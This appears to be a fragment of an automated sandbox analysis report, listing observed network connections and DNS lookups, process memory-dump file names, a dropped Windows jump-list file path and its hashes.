GB | 88.221.135.113:80 | e6.o.lencr.org | tcp
US | 66.63.187.231:80 | 66.63.187.231 | tcp
US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 113.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 231.187.63.66.in-addr.arpa | udp
US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 200.79.70.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp

Files

memory/2668-0-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-3-0x00007FFB79C4D000-0x00007FFB79C4E000-memory.dmp

memory/2668-2-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-1-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-5-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-4-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-8-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-9-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-10-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-12-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-13-0x00007FFB37A90000-0x00007FFB37AA0000-memory.dmp

memory/2668-11-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-7-0x00007FFB39C30000-0x00007FFB39C40000-memory.dmp

memory/2668-6-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-14-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-15-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-17-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-16-0x00007FFB37A90000-0x00007FFB37AA0000-memory.dmp

memory/2668-20-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-19-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-21-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-18-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-39-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-42-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-46-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-45-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2668-51-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-52-0x00007FFB79BB0000-0x00007FFB79DA5000-memory.dmp

memory/2168-53-0x00007FF7AB920000-0x00007FF7AB928000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 aec0871fd8096f0bb7d3cd4f2623c5c9
SHA1 a294aa235e2620c3ab5a16ff168e911585ce2680
SHA256 16b85a23b0efe2543b8f122e11ee554b31f72384509c4084b2c89cdedca413b3
SHA512 8ab42c6943adf65fc28cd48e64cb18811cca2e7d6a34708c77a31db10516508f7153bca35048fa7ecc851e715bd2e4b5354328ebd841f644caa3cdd2a66049ea